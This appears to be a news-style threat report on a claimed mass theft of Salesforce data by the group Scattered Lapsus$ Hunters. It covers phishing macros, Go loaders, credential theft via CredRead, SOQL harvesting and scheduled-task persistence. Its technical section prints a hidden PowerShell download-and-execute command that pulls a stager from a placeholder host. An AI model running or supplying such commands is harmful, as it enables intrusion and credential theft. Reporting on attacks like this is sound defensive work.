In a significant escalation of cybercriminal activity, the group known as Scattered Lapsus$ Hunters has announced the exfiltration of more than one billion records from Salesforce environments globally. This collective, comprising members from notorious hacking groups such as ShinyHunters, Scattered Spider, and Lapsus$, has been linked to a series of high-profile data breaches throughout 2025.
Emergence and Tactics
Emerging in mid-2025, Scattered Lapsus$ Hunters have refined their methods to exploit vulnerabilities in cloud identities and exposed APIs. Their operations have predominantly targeted Salesforce, a leading customer relationship management (CRM) platform, underscoring the critical importance of securing cloud-based services.
Initial Indicators and Investigation
The breach came to light when multiple Salesforce customers detected unusual queries within their CRM instances during off-hours. These anomalies suggested the deployment of automated extraction tools. Subsequent forensic analyses revealed that the scale of data accessed was unprecedented, indicating a well-coordinated and sophisticated attack.
Attack Methodology
The attackers employed a combination of targeted phishing campaigns and credential stuffing techniques to gain initial access. Victims received emails that appeared legitimate, prompting them to perform mandatory security updates. These emails contained malicious Office macros which, when executed, connected to remote command-and-control servers to install lightweight loaders.
Security researchers noted that these loaders were written in Go and compiled with stripped symbols, complicating reverse engineering efforts. Once operational, the loaders validated API tokens and initiated multi-stage data harvesting routines, systematically extracting vast amounts of sensitive information.
Impact and Implications
The ramifications of this breach extend beyond the exposure of personal data. Proprietary sales strategies, pipeline forecasts, and confidential client negotiations have been compromised. Given that many organizations rely heavily on Salesforce for mission-critical operations, such a compromise can lead to significant operational disruptions and reputational damage.
Early estimates suggest that the group may have extracted data at a sustained rate exceeding 500 gigabytes per hour, transmitting records in encrypted batches to evade detection.
Technical Details of the Infection Mechanism
A closer examination of the infection mechanism reveals a strategic emphasis on stealth and persistence. After the initial macro dropper executes, a PowerShell script stager is launched through a command such as:
“`powershell
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString(‘https://cdn.example.com/stager.ps1’))}
“`
This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then decrypts credentials stored in the Windows Credential Manager using the `CredRead` API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the data access requirements.
Once authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch records. Each batch is buffered in memory and encrypted with ChaCha20 before being transmitted over HTTPS to a dedicated exfiltration endpoint.
To ensure persistence, the malware registers a scheduled task named `UpdaterSvc` that triggers every two hours. This task validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the last successful record ID.
Conclusion
The meticulous approach of Scattered Lapsus$ Hunters to API rate-limit evasion and credential harvesting underscores an advanced understanding of cloud-native environments. By combining sophisticated social engineering, custom tooling, and resilient persistence tactics, they have demonstrated a formidable capability to compromise enterprise Salesforce instances at scale.
